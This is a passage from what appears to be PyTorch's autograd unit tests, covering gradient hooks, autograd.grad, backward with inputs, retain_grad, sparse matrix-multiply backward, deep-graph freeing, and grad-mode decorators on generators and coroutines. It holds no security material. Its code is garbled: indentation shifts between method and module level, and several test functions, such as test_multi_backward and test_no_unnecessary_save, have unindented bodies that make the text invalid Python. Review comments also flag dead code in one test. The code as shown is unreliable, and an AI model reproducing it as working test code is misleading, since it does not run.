        self.assertEqual(grad_b, go * 2)
        self.assertFalse(hook_called[0])
        self.assertIsNone(x.grad)
    def test_grad_nonleaf_register_hook(self):
        """A hook on one unbound slice only fires for that slice's backward; no segfault for the rest."""
        # This checks an edge case for register_hook.
        # We want to capture grad of a nonleaf tensor,
        # but avoid segfault during backward of other nonleaf tensors
        x = torch.randn(5, requires_grad=True)
        x_list = x.unbind()
        x0 = x_list[0]
        hook_results = [None]
        def hook(grad):
            hook_results[0] = grad
        x0.register_hook(hook)
        x_list[0].backward()
        self.assertEqual(hook_results[0], torch.tensor(1.))
        expected_grad = torch.tensor([1., 0, 0, 0, 0])
        self.assertEqual(x.grad, expected_grad)
        self.assertIsNone(x_list[0].grad)
        for i in range(1, 5, 1):
            x_list[i].backward()
            # Hook registered on x0 must not fire for the other slices.
            self.assertEqual(hook_results[0], None)
            expected_grad[i] = 1.0
            self.assertEqual(x.grad, expected_grad)
            self.assertIsNone(x_list[i].grad)
    def test_hook_with_no_name(self):
        """register_hook accepts callables without a __name__ attribute."""
        # Create a hook that do not have a __name__ attribute
        class MyHookClass:
            def __call__(self, grad):
                return grad.clone()
        x = torch.randn(5, requires_grad=True).clone()
        x.register_hook(MyHookClass())
        x.sum().backward()
        # Should run fine
    def test_sharded_grad(self):
        """Backward can be split: grad() per shard of intermediates, then backward() from them."""
        leaves = [torch.zeros(5, 5, requires_grad=True) for _ in range(10)]
        intermediates = [l * i + l * l for i, l in enumerate(leaves)]
        loss = sum(v * i for i, v in enumerate(intermediates)).sum()
        # define a helper for dividing intermediates into groups
        def group(l, group_size):
            return (l[i:i + group_size] for i in range(0, len(l), group_size))
        # Compute the d loss / d intermediates in chunks of shard_size
        shard_size = 2
        d_intermediates = [d_i for intermediates_batch in group(intermediates, shard_size)
                           for d_i in torch.autograd.grad(loss, intermediates_batch)]
        # Compute rest of backward pass
        torch.autograd.backward(intermediates, d_intermediates)
        for i, l in enumerate(leaves):
            self.assertEqual(l.grad, i * i * (1 + l))
    def test_backward_badcalls(self):
        """backward() on a tensor that does not require grad raises RuntimeError."""
        x = torch.ones(1)
        with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
            x.backward()
    def test_grad_badcalls(self):
        """autograd.grad rejects outputs/inputs that do not require grad."""
        x = torch.ones(1)
        y = x ** 2
        with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
            torch.autograd.grad(x, y)
        with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
            torch.autograd.grad(y, x)
        x = torch.ones(1, requires_grad=True)
        y = x ** 2
        torch.autograd.grad(y, x)  # this should succeed now
    def test_grad_empty_inputs(self):
        """autograd.grad with an empty inputs list raises ValueError."""
        x = torch.tensor([1.0], requires_grad=True)
        with self.assertRaisesRegex(ValueError, "grad requires non-empty inputs."):
            torch.autograd.grad(2 * x, [], grad_outputs=torch.tensor([1.0]))
    def test_grad_fn_badcalls(self):
        """Calling a grad_fn directly with the wrong arity raises TypeError."""
        error_regex = 'expected .* arguments, got .* instead'
        x = torch.ones(1, requires_grad=True)
        y = x ** 2
        with self.assertRaisesRegex(TypeError, error_regex):
            y.grad_fn(x.detach(), x.detach())  # too many
        with self.assertRaisesRegex(TypeError, error_regex):
            y.grad_fn()  # too few
        y.grad_fn(x.detach())  # this should succeed
def test_grad_unreachable(self):
    """grad() with allow_unused=True returns None for unreachable inputs,
    and raises when allow_unused=False."""
    x = torch.ones(1, requires_grad=True)
    y = torch.ones(1, requires_grad=True)
    # Make sure x and y have grad accumulators allocated
    z = x * 2
    w = y * 2

    grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=True)
    self.assertEqual(grad_x, x * 2)
    self.assertIsNone(grad_y)

    # This is slightly different than the case above, because z doesn't even
    # have a grad accumulator allocated.
    z = torch.ones(1, requires_grad=True)
    grad_x, grad_z = torch.autograd.grad(x * 2, [x, z], allow_unused=True)
    self.assertEqual(grad_x, x * 2)
    self.assertIsNone(grad_z)

    # allow_unused=False, but grads contains None inside, should throw
    with self.assertRaisesRegex(RuntimeError,
                                "Set allow_unused=True"):
        grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=False)
def test_grad_unreachable_discovery(self):
    """Unreachable-input discovery must not execute unrelated nodes.

    Test that certain nodes are not erroneously executed when an input
    is unreachable. See #39784.  MyFunc.backward fails the test if the
    engine ever runs it.
    """
    class MyFunc(torch.autograd.Function):
        @staticmethod
        def forward(ctx, x):
            return x

        @staticmethod
        def backward(ctx, x):
            self.fail("This node should not be executed!")

    x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
    y = torch.randn(1, requires_grad=True)
    (gY,) = torch.autograd.grad(x, (y, ), allow_unused=True)
    self.assertIsNone(gY)

    x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
    y = torch.randn(1, requires_grad=True)
    z = torch.randn(1, requires_grad=True)
    # z IS reachable through x + z, so only y's grad is None
    (gY, gZ) = torch.autograd.grad(x + z, (y, z), allow_unused=True)
    self.assertIsNone(gY)
    self.assertIsNotNone(gZ)

    x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
    y = torch.randn(1, requires_grad=True)
    torch.autograd.backward(x, inputs=(y, ))  # allow_unused is implicitly True!
    self.assertIsNone(y.grad)
def test_hooks(self):
    """Tensor hooks fire once per backward call, can be removed via the
    returned handle, and can rewrite the gradient by returning a tensor."""
    x = torch.ones(5, 5, requires_grad=True)
    y = torch.ones(5, 5) * 4
    y.requires_grad_(True)

    counter = [0]

    def bw_hook(inc, grad):
        self.assertIsInstance(grad, torch.Tensor)
        counter[0] += inc

    z = x ** 2 + x * 2 + x * y + y
    # hook on x adds 0, hook on z adds 1 -> counter tracks z-hook firings
    x.register_hook(lambda *args: bw_hook(0, *args))
    test = z.register_hook(lambda *args: bw_hook(1, *args))
    z.backward(torch.ones(5, 5), retain_graph=True)
    self.assertEqual(counter[0], 1)

    # a second z-hook adds 2 more per backward: 1 + (1 + 2) = 4
    test2 = z.register_hook(lambda *args: bw_hook(2, *args))
    z.backward(torch.ones(5, 5), retain_graph=True)
    self.assertEqual(counter[0], 4)

    test2.remove()
    z.backward(torch.ones(5, 5), retain_graph=True)
    self.assertEqual(counter[0], 5)

    def bw_hook_modify(grad):
        return grad.mul(2)

    test.remove()
    z.register_hook(bw_hook_modify)
    with torch.no_grad():
        y.grad.zero_()
    z.backward(torch.ones(5, 5), retain_graph=True)
    # dz/dy = x + 1; the z-hook doubles the incoming gradient
    self.assertEqual(y.grad, (x + 1) * 2)

    y.register_hook(bw_hook_modify)
    with torch.no_grad():
        y.grad.zero_()
    z.backward(torch.ones(5, 5))
    # both the z-hook and the y-hook double it: (x + 1) * 4
    self.assertEqual(y.grad, (x + 1) * 4)
def test_hooks_cpp(self):
    """Hooks also fire for autograd functions implemented in C++."""
    # Tests hooks for autograd function implemented in C++
    bn = torch.nn.BatchNorm1d(5, affine=False)
    bn.double()
    bn.eval()

    counter = [0]

    def bw_hook(grad):
        counter[0] += 1
        return grad * 2

    x = torch.ones(5, 5, dtype=torch.double, requires_grad=True)
    z = bn(x)
    z.register_hook(bw_hook)
    z.sum().backward()

    self.assertEqual(counter[0], 1, msg='bw_hook not called')
    # NOTE(review): expects eval-mode BatchNorm (no affine) to be ~identity
    # here so the doubled upstream gradient reaches x within 1e-5 — confirm.
    self.assertEqual(x.grad, torch.ones(5, 5, dtype=torch.double) * 2, atol=1e-5, rtol=0)
def test_hook_none(self):
    """Hooks must never observe a None gradient, even when a Function's
    backward returns None for some inputs."""
    # WARNING: this is a test for autograd internals.
    # You should never have to use such things in your code.
    class NoneGradientFunction(Function):
        @staticmethod
        def forward(ctx, x, y):
            assert ctx.needs_input_grad[0]
            assert not ctx.needs_input_grad[1]
            return x, y

        @staticmethod
        def backward(ctx, grad_x, grad_y):
            return grad_x, None

    was_called = [False]

    def hook(grad):
        self.assertIsNotNone(grad)
        was_called[0] = True

    x = torch.randn(5, 5, requires_grad=True)
    y = torch.randn(5, 5)
    rx, ry = NoneGradientFunction.apply(x, y)
    rx.register_hook(hook)
    ry.register_hook(hook)
    # builtin sum() with start=ry: adds the rows of rx onto ry
    sum(rx, ry).sum().backward()
    self.assertTrue(was_called[0])
def test_retain_grad(self):
    """retain_grad() makes a non-leaf keep .grad, accumulates across calls,
    and is a no-op on leaves."""
    input = torch.rand(1, 3, requires_grad=True)
    h1 = input * 3
    out = (h1 * h1).sum()

    # It should be possible to call retain_grad() multiple times
    h1.retain_grad()
    h1.retain_grad()

    # Gradient should be accumulated
    out.backward(retain_graph=True)
    self.assertEqual(h1 * 2, h1.grad)
    out.backward(retain_graph=True)
    self.assertEqual(h1 * 4, h1.grad)

    with torch.no_grad():
        input.grad.zero_()
    # It should be a no-op for leaves
    input.retain_grad()
    input.retain_grad()
    out.backward()
    # d(out)/d(input) = 2 * h1 * 3 = 18 * input
    self.assertEqual(input * 18, input.grad)
def test_retain_grad_cycle(self):
    """retain_grad() must not create a reference cycle that keeps the
    tensor alive after it goes out of scope."""
    x = torch.ones(5, 5, requires_grad=True)

    def run_test():
        y = x * 2
        y.retain_grad()
        # return a downstream value plus a weak ref to y (internal API)
        return y / 2, torch._C._WeakTensorRef(y)

    z, ref = run_test()
    # y left scope above; despite retain_grad() the weak ref must be dead
    self.assertTrue(ref.expired())
    z.sum().backward()
def test_backward(self):
    """backward() produces the analytically expected gradients for a
    composite expression in x, y, z."""
    v = torch.randn(5, 5, requires_grad=True)
    x = torch.randn(5, 5, requires_grad=True)
    # keep y bounded away from zero: it appears in denominators below
    y = (torch.rand(5, 5) + 0.1).requires_grad_(True)
    z = torch.randn(5, 5, requires_grad=True)
    grad_output = torch.randn(5, 5)

    v.backward(grad_output)
    self.assertEqual(v.grad, grad_output)

    a = x + (y * z) + 4 * z ** 2 * x / y
    a.backward(grad_output)
    # hand-derived partials of `a`
    x_grad = 4 * z.pow(2) / y + 1
    y_grad = z - 4 * x * z.pow(2) / y.pow(2)
    z_grad = 8 * x * z / y + y
    self.assertEqual(x.grad, x_grad * grad_output)
    self.assertEqual(y.grad, y_grad * grad_output)
    self.assertEqual(z.grad, z_grad * grad_output)
def test_sparse_mm_backward(self):
    """Sparse mm/addmm backward: unsupported sparse-layout combinations
    raise a descriptive error; supported ones match the dense result."""
    size = (3, 3)

    sparse = torch.sparse_coo_tensor(size, requires_grad=True)
    dense = torch.randn(size, requires_grad=True)

    with self.assertRaisesRegex(
            RuntimeError,
            "The backward pass for this operation requires the 'mat1' tensor to be strided,"):
        z = dense.addmm(sparse, dense)

    mm_test_cases = [
        # a requires grad, a is sparse, b requires grad, b is sparse, error message
        (False, True, True, False, None),
        (False, False, True, True, "The backward pass for this operation requires the 'mat2'"),
        (False, True, True, True, "The backward pass for this operation requires the 'mat2'"),
        (True, False, True, True, "The backward pass for this operation requires the 'mat2'"),
        (True, True, False, False, "The backward pass for this operation requires the 'self'"),
        (True, True, True, False, "The backward pass for this operation requires the 'self'"),
        (True, True, True, True, "The backward pass for this operation requires the 'mat2'"),
    ]
    for a_req_grad, a_is_sparse, b_req_grad, b_is_sparse, err_msg in mm_test_cases:
        # We should only be testing cases with sparse inputs, and at least one
        # input needs to require grad so we can call a backward pass
        assert a_is_sparse or b_is_sparse
        assert a_req_grad or b_req_grad

        a = torch.randn(size, requires_grad=a_req_grad)
        if a_is_sparse:
            a = a.to_sparse()
        b = torch.randn(size, requires_grad=b_req_grad)
        if b_is_sparse:
            b = b.to_sparse()

        # If no error expected, check that sparse and dense cases match
        if err_msg is None:
            r = a.mm(b)
            r.sum().backward()
            a_grad = None if a.grad is None else a.grad.clone().detach()
            b_grad = None if b.grad is None else b.grad.clone().detach()

            # Redo with only dense tensors
            a = (a.to_dense() if a.is_sparse else a).clone().detach()
            a.requires_grad = a_req_grad
            b = (b.to_dense() if b.is_sparse else b).clone().detach()
            b.requires_grad = b_req_grad
            r = a.mm(b)
            r.sum().backward()

            self.assertEqual(a_grad, a.grad)
            self.assertEqual(b_grad, b.grad)
        else:
            with self.assertRaisesRegex(RuntimeError, err_msg):
                a.mm(b)
def test_multi_backward(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
q = torch.randn(5, 5, requires_grad=True)
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
q2 = q * 2
z = x + y + q2
c = a * b + q2
grad_z = torch.randn(5, 5)
grad_c = torch.randn(5, 5)
torch.autograd.backward([z, c], [grad_z, grad_c])
self.assertEqual(x.grad, grad_z)
self.assertEqual(y.grad, grad_z)
self.assertEqual(a.grad, grad_c * b)
self.assertEqual(b.grad, grad_c * a)
self.assertEqual(q.grad, (grad_c + grad_z) * 2)
def test_multi_backward_no_grad(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=False)
z = x + y
q = y * 2
# NB: we currently raise an exception if any arguments to backwards
# have requires_grad=False and don't have a grad_fn. We may want to
# relax that check to a warning.
def call_backwards():
torch.autograd.backward([z, q], [torch.ones(5, 5), torch.ones(5, 5)])
self.assertRaises(RuntimeError, call_backwards)
def test_backward_with_inputs(self):
    """backward(inputs=...) accumulates gradients only into the listed
    inputs; an empty inputs list is rejected."""
    x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
    y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)

    def fn():
        return x ** 2 + y * x + y ** 2

    gradient = torch.ones(2, 2)
    x_grad_expected = 2 * x + y
    y_grad_expected = x + 2 * y

    @torch.no_grad()
    def reset_grad():
        x.grad.zero_()
        y.grad.zero_()

    torch.autograd.backward(fn(), gradient, inputs=[x, y])
    self.assertEqual(x.grad, x_grad_expected)
    self.assertEqual(y.grad, y_grad_expected)

    reset_grad()
    torch.autograd.backward(fn(), gradient, inputs=[x])
    self.assertEqual(x.grad, x_grad_expected)
    # y was excluded from inputs, so its (zeroed) grad must stay zero
    self.assertEqual(y.grad, torch.zeros(2, 2), exact_dtype=False)

    reset_grad()
    torch.autograd.backward(fn(), gradient, inputs=[y])
    self.assertEqual(y.grad, y_grad_expected)
    self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)

    reset_grad()
    # a bare tensor (not wrapped in a list) is also accepted as inputs
    torch.autograd.backward(fn(), gradient, inputs=y)
    self.assertEqual(y.grad, y_grad_expected)
    self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)

    reset_grad()
    self.assertRaisesRegex(RuntimeError, 'cannot be empty',
                           lambda: torch.autograd.backward(fn(), gradient, inputs=[]))
def test_backward_with_nonleaf_inputs(self):
    """backward(inputs=...) also populates .grad of listed non-leaf tensors."""
    x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
    x_nonleaf = x * 1
    y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
    z = torch.randn(2, 2, dtype=torch.double, requires_grad=True)

    out = x_nonleaf ** 2 + y * x_nonleaf + y ** 2

    out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[x, y, x_nonleaf])
    x_grad_expected = 2 * x + y
    y_grad_expected = x + 2 * y
    x_non_leaf_expected = 2 * x_nonleaf + y

    self.assertEqual(y.grad, y_grad_expected)
    self.assertEqual(x.grad, x_grad_expected)
    self.assertEqual(x_nonleaf.grad, x_non_leaf_expected)

    # backward doesn't have an allow_unused flag, so the behavior of backward
    # when a variable is not part of the graph is as if allow_unused were True:
    # z.grad will simply be None.
    out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[z])
    self.assertIsNone(z.grad)
def test_dependent_backward(self):
x = torch.randn(10, requires_grad=True)
y = x ** 2
z = y ** 3
go_y = torch.randn(10)
go_z = torch.randn(10)
torch.autograd.backward([y, z], [go_y, go_z])
xd = x
self.assertEqual(x.grad, 2 * xd * go_y + 6 * xd.pow(5) * go_z)
def test_save_output_nr(self):
    """save_for_backward must preserve the saved tensor's output_nr."""
    x = torch.randn(10, requires_grad=True)

    class MultiOutputFn(Function):
        @staticmethod
        def forward(ctx, x):
            return x[:5], x[5:]

        @staticmethod
        def backward(ctx, *grad):
            return torch.cat(grad)

    a, b = MultiOutputFn.apply(x)
    # b is the second output of MultiOutputFn
    self.assertEqual(b.output_nr, 1)

    class TestFn(Function):
        @staticmethod
        def forward(ctx, b):
            ctx.save_for_backward(b)
            return b * 2

        @staticmethod
        def backward(ctx, grad_b):
            b, = ctx.saved_tensors
            # the saved tensor must still report output_nr == 1
            self.assertEqual(b.output_nr, 1)

    TestFn.apply(b).sum().backward()
def test_free_deep_graph(self):
    """Deleting a very deep chain graph must not overflow the C stack."""
    def scope():
        depth = 150000
        x = torch.randn(1, requires_grad=True)
        y = x.clone()

        # build a "chain" computation graph
        for _ in range(depth):
            y = y + y * 0.000001

        # graph deletion occurs when the above locals go out of scope.
        # In this case `del y` will trigger it but it's easier to leave
        # it to Python to delete the locals.

    # Should not stack overflow
    scope()
def test_free_deep_graph_complicated(self):
    """Deleting a deep graph with (intended) skip connections must not
    overflow the C stack."""
    def scope():
        depth = 100000
        randchoice = torch.randint(2, [depth, 2])
        x = torch.randn(1, requires_grad=True)
        y = x.clone()

        # Hold the two previous values
        prev_values = [None, None]

        # Build a "chain with skip connections" graph
        for _ in range(depth):
            # NOTE(review): prev_values[:-1] yields at most ONE element, so
            # nprev can never reach 2 and the skip-connection branch below is
            # dead; if it ever ran, randchoice[depth] would also be out of
            # range (valid row indices are 0..depth-1). Confirm intent.
            prev_tensors = [tensor for tensor in prev_values[:-1]
                            if tensor is not None]
            prev_values.append(y)
            prev_values.pop(0)

            # Definitely pick one tensor to add
            y += y * 0.000001

            # Possibly add other tensors
            nprev = len(prev_tensors)
            if nprev == 2:
                y += randchoice[depth].mul(torch.cat(prev_tensors)).sum()

        # graph deletion occurs when the above locals go out of scope.

    # Should not stack overflow
    scope()
def test_free_deep_graph_pyfunction(self):
    """Deleting a deep graph built from Python autograd Functions must not
    overflow the C stack."""
    class MyOp(Function):
        @staticmethod
        def forward(ctx, tensor1, tensor2):
            return tensor1 + tensor2

        @staticmethod
        def backward(ctx, grad_output):
            return grad_output, grad_output

    def scope():
        depth = 150000
        x = torch.randn(1, requires_grad=True)
        y = x.clone()

        # build deeply nested computation graph
        for _ in range(depth):
            y = MyOp.apply(y, y)

        # graph deletion occurs when the above locals go out of scope.

    # Should not stack overflow
    scope()
def test_no_unnecessary_save(self):
# If we kept x in the derivative Function of x * 2 we would
# get an error in the backward that would complain that we've
# modified x, which was needed for gradient computation.
# Since we should elide unnecessary saves, this test should pass.
mu = torch.ones(1, requires_grad=True)
x = torch.empty(1)
loss = 0
for i in range(3):
x.detach_()
x.copy_(mu + i)
ft = torch.tensor([float(i)])
multiplied = x * ft
s = multiplied.sum()
loss += s
loss.backward()
def test_no_grad(self):
    """torch.no_grad works both as a context manager and as a decorator,
    and nesting the two preserves the disabled state."""
    x = torch.ones(5, 5, requires_grad=True)
    y = torch.ones(5, 5) * 4
    with torch.no_grad():
        w = x + y

    @torch.no_grad()
    def adder(x, y):
        return x + y

    z = adder(x, y)

    self.assertFalse(w.requires_grad)
    self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))
    self.assertIsNone(w.grad_fn)
    self.assertFalse(z.requires_grad)
    self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
    self.assertIsNone(z.grad_fn)

    # test nested decorator and with-statement on no_grad
    with torch.no_grad():
        self.assertFalse(torch.is_grad_enabled())
        w = adder(x, y)
        self.assertFalse(torch.is_grad_enabled())
def test_set_grad_generator_functions(self):
    """Grad-mode decorators apply inside generator bodies regardless of
    the grad mode active at the call site."""
    @torch.no_grad()
    def gen_no_grad():
        for i in range(10):
            self.assertEqual(torch.is_grad_enabled(), False)
            yield i

    with torch.enable_grad():
        for _ in gen_no_grad():
            # the caller's grad mode is restored between yields
            self.assertEqual(torch.is_grad_enabled(), True)

    @torch.enable_grad()
    def gen_enable_grad():
        for i in range(10):
            self.assertEqual(torch.is_grad_enabled(), True)
            yield i

    with torch.no_grad():
        for _ in gen_enable_grad():
            self.assertEqual(torch.is_grad_enabled(), False)
def test_set_grad_generator_functions_recursive(self):
    """Grad-mode decorators and context managers preserve the caller's
    setting across mutual recursion."""
    # enable_grad_decorator_recursive and no_grad_decorator_recursive call each other
    # recursively, to ensure that the decorators preserve the caller's setting
    @torch.enable_grad()
    def enable_grad_decorator_recursive(depth):
        self.assertTrue(torch.is_grad_enabled())
        if depth > 0:
            no_grad_decorator_recursive(depth - 1)
            self.assertTrue(torch.is_grad_enabled())

    @torch.no_grad()
    def no_grad_decorator_recursive(depth):
        self.assertFalse(torch.is_grad_enabled())
        if depth > 0:
            enable_grad_decorator_recursive(depth - 1)
            self.assertFalse(torch.is_grad_enabled())

    # enable_grad_context_manager_recursive and no_grad_context_manager_recursive call
    # each other recursively, to ensure that the decorators preserve the caller's setting
    def enable_grad_context_manager_recursive(depth):
        with torch.enable_grad():
            self.assertTrue(torch.is_grad_enabled())
            if depth > 0:
                no_grad_context_manager_recursive(depth - 1)
                self.assertTrue(torch.is_grad_enabled())

    def no_grad_context_manager_recursive(depth):
        with torch.no_grad():
            self.assertFalse(torch.is_grad_enabled())
            if depth > 0:
                enable_grad_context_manager_recursive(depth - 1)
                self.assertFalse(torch.is_grad_enabled())

    # run both recursion ladders from each starting grad mode
    with torch.enable_grad():
        self.assertTrue(torch.is_grad_enabled())
        enable_grad_decorator_recursive(10)
        self.assertTrue(torch.is_grad_enabled())
        enable_grad_context_manager_recursive(10)
        self.assertTrue(torch.is_grad_enabled())

    with torch.no_grad():
        self.assertFalse(torch.is_grad_enabled())
        enable_grad_decorator_recursive(10)
        self.assertFalse(torch.is_grad_enabled())
        enable_grad_context_manager_recursive(10)
        self.assertFalse(torch.is_grad_enabled())
def test_set_grad_coroutines(self):
    """A grad-mode decorator on a coroutine applies only inside the
    coroutine body; the caller's mode is restored around each send()."""
    @torch.no_grad()
    def coro_no_grad(n=10):
        self.assertFalse(torch.is_grad_enabled())
        for i in range(n):
            self.assertFalse(torch.is_grad_enabled())
            r = yield i
            self.assertFalse(torch.is_grad_enabled())
            # the driver echoes back the value we just yielded
            self.assertEqual(i, r)
        self.assertFalse(torch.is_grad_enabled())

    @torch.enable_grad()
    def coro_enable_grad(n=10):
        self.assertTrue(torch.is_grad_enabled())
        for i in range(n):
            self.assertTrue(torch.is_grad_enabled())
            r = yield i
            self.assertTrue(torch.is_grad_enabled())
            self.assertEqual(i, r)
        self.assertTrue(torch.is_grad_enabled())

    with torch.enable_grad():
        self.assertTrue(torch.is_grad_enabled())
        coro, r = coro_no_grad(), None
        try:
            while True:
                self.assertTrue(torch.is_grad_enabled())
                r = coro.send(r)
                self.assertTrue(torch.is_grad_enabled())
        except StopIteration:
            pass

    with torch.no_grad():
        self.assertFalse(torch.is_grad_enabled())
        coro, r = coro_enable_grad(), None
        try:
            while True:
                self.assertFalse(torch.is_grad_enabled())
                r = coro.send(r)
                self.assertFalse(torch.is_grad_enabled())
        except StopIteration:
            pass
def test_set_grad_coroutines_benign_exceptions(self):
    """Grad mode inside a coroutine survives exceptions thrown in via
    throw() and handled by the coroutine."""
    class RecoverableException(Exception):
        pass

    @torch.no_grad()
    def coro_no_grad(n=10):
        has_raised = False
        for i in range(n):
            try:
                self.assertFalse(torch.is_grad_enabled())
                # negative values signal that the exception was seen
                yield (-i if has_raised else i)
            except RecoverableException:
                self.assertFalse(torch.is_grad_enabled())
                has_raised = True

    @torch.enable_grad()
    def coro_enable_grad(n=10):
        has_raised = False
        for i in range(n):
            try:
                self.assertTrue(torch.is_grad_enabled())
                yield (-i if has_raised else i)
            except RecoverableException:
                self.assertTrue(torch.is_grad_enabled())
                has_raised = True

    with torch.enable_grad():
        coro = coro_no_grad()
        assert 0 == next(coro)
        try:
            while True:
                r = coro.throw(RecoverableException)
                self.assertLess(r, 0)
        except StopIteration:
            pass

    with torch.no_grad():
        coro = coro_enable_grad()
        assert 0 == next(coro)
        try:
            while True:
                r = coro.throw(RecoverableException)
                self.assertLess(r, 0)
        except StopIteration:
            pass
def test_set_grad_coroutines_critical_exceptions(self):
    """Grad mode is still correct inside a coroutine's except-block even
    when the coroutine escalates by raising a different exception."""
    class UnrecoverableException(Exception):
        pass

    class SecondaryException(Exception):
        pass

    @torch.no_grad()
    def coro_no_grad(n=10):
        has_raised = False
        for i in range(n):
            try:
                self.assertFalse(torch.is_grad_enabled())
                yield (-i if has_raised else i)
            except UnrecoverableException:
                self.assertFalse(torch.is_grad_enabled())
                raise SecondaryException

    @torch.enable_grad()
    def coro_enable_grad(n=10):
        has_raised = False
        for i in range(n):
            try:
                self.assertTrue(torch.is_grad_enabled())
                yield (-i if has_raised else i)
            except UnrecoverableException:
                self.assertTrue(torch.is_grad_enabled())
                raise SecondaryException

    with torch.enable_grad():
        coro = coro_no_grad()
        assert 0 == next(coro)
        with self.assertRaises(SecondaryException):
            coro.throw(UnrecoverableException)

    with torch.no_grad():
        coro = coro_enable_grad()
        assert 0 == next(coro)
        with self.assertRaises(SecondaryException):
            coro.throw(UnrecoverableException)
def test_set_grad_coroutines_exit(self):
    """Grad mode is correct inside GeneratorExit handling when a
    coroutine is close()d early."""
    @torch.no_grad()
    def coro_no_grad(state):
        for i in range(10):
            try:
                self.assertFalse(torch.is_grad_enabled())
                yield i
            except GeneratorExit:
                self.assertFalse(torch.is_grad_enabled())
                state.add('GeneratorExit')
                raise

    @torch.enable_grad()
    def coro_enable_grad(state):
        for i in range(10):
            try:
                self.assertTrue(torch.is_grad_enabled())
                yield i
            except GeneratorExit:
                self.assertTrue(torch.is_grad_enabled())
                state.add('GeneratorExit')
                raise

    state = set()
    with torch.enable_grad():
        coro = coro_no_grad(state)
        for i in range(5):
            next(coro)

        coro.close()
    self.assertTrue('GeneratorExit' in state)

    state = set()
    with torch.no_grad():
        coro = coro_enable_grad(state)
        for i in range(5):
            next(coro)

        coro.close()
    self.assertTrue('GeneratorExit' in state)
def test_no_grad_python_function(self):
    """Python Functions should respect grad mode."""
    x = torch.ones(5, 5, requires_grad=True)

    class MyOp(Function):
        @staticmethod
        def forward(self, x):
            return x + 1

        @staticmethod
        def backward(self, dy):
            return dy

    with torch.no_grad():
        y = MyOp.apply(x)
    # applied under no_grad, so no graph is recorded for y
    self.assertFalse(y.requires_grad)
def test_indexing(self):
    """Gradients of basic and advanced indexing flow back only to the
    indexed positions of the source tensor."""
    x = torch.arange(1., 17).view(4, 4)
    y = Variable(x, requires_grad=True)

    def compare(x, y, idx, indexed_tensor, indexed_var):
        # forward values must match the plain-tensor indexing result
        indexed_var_t = indexed_var.data
        if not isinstance(indexed_tensor, torch.Tensor):
            indexed_var_t = indexed_var_t[0]
        self.assertEqual(indexed_tensor, indexed_var_t)

        # gradient must be 1 exactly at the indexed positions
        indexed_var.sum().backward()
        expected_grad = torch.empty(x.size()).fill_(0)
        expected_grad[idx] = 1
        self.assertEqual(y.grad, expected_grad)

    def check_index(x, y, idx):
        # zero any grad accumulated by a previous check
        if y.grad is not None:
            with torch.no_grad():
                y.grad.zero_()
        indexed_tensor = x[idx]
        indexed_var = y[idx]
        compare(x, y, idx, indexed_tensor, indexed_var)

    check_index(x, y, 1)
    check_index(x, y, (1, 1))
    check_index(x, y, slice(1, None))
    check_index(x, y, slice(None, 2))
    check_index(x, y, (slice(None, 2), 2))
    check_index(x, y, (slice(1, 2), 2))
    check_index(x, y, (1, slice(2, None)))
    check_index(x, y, (slice(None, None), slice(2, None)))
    check_index(x, y, torch.LongTensor([0, 2]))
    check_index(x, y, torch.rand(4, 4).bernoulli().bool())
    check_index(x, y, (Ellipsis, slice(2, None)))
    check_index(x, y, ([0], [0]))
    check_index(x, y, ([1, 2, 3], [0]))
    check_index(x, y, ([1, 2], [2, 1]))
    check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 3]]))
    check_index(x, y, ([slice(None), [2, 3]]))
    check_index(x, y, ([[2, 3], slice(None)]))

    # advanced indexing, with less dim, or ellipsis
    check_index(x, y, ([0]))
    check_index(x, y, ([0], ))

    x = torch.arange(1., 49).view(4, 3, 4)
    y = Variable(x, requires_grad=True)

    check_index(x, y, (slice(None), [0], [0]))
    check_index(x, y, ([0], [0], slice(None)))
    check_index(x, y, (slice(None), [0, 1, 2], [0]))
    check_index(x, y, ([0, 1, 2], [0], slice(None)))
    check_index(x, y, (slice(None), [1, 2], [2, 1]))
    check_index(x, y, ([1, 2], [2, 1], slice(None)))
    check_index(x, y, (slice(None), [[1, 2], [2, 0]], [[0, 1], [2, 3]]))
    check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 2]], slice(None)))
    check_index(x, y, (slice(None), slice(None), [2, 1]))
    check_index(x, y, (slice(None), [2, 1], slice(None)))
    check_index(x, y, ([2, 1], slice(None), slice(None)))

    # advanced indexing, with less dim, or ellipsis
    check_index(x, y, ([0], ))
    check_index(x, y, ([0], slice(None)))
    check_index(x, y, ([0], Ellipsis))
    check_index(x, y, ([1, 2], [0, 1]))
    check_index(x, y, ([1, 2], [0, 1], Ellipsis))
    check_index(x, y, (Ellipsis, [1, 2], [0, 1]))

    # advanced indexing, with a tensor wrapped in a variable
    z = torch.LongTensor([0, 1])
    zv = Variable(z, requires_grad=False)
    seq = [z, Ellipsis]
    seqv = [zv, Ellipsis]

    if y.grad is not None:
        with torch.no_grad():
            y.grad.zero_()
    indexed_tensor = x[seq]
    indexed_var = y[seqv]
    compare(x, y, seq, indexed_tensor, indexed_var)
def test_indexing_duplicates(self):
    """Duplicate indices must accumulate gradients (one unit per occurrence)."""
    x = torch.arange(1., 17).view(4, 4)
    y = Variable(x, requires_grad=True)

    idx = torch.LongTensor([1, 1, 3, 2, 1, 2])
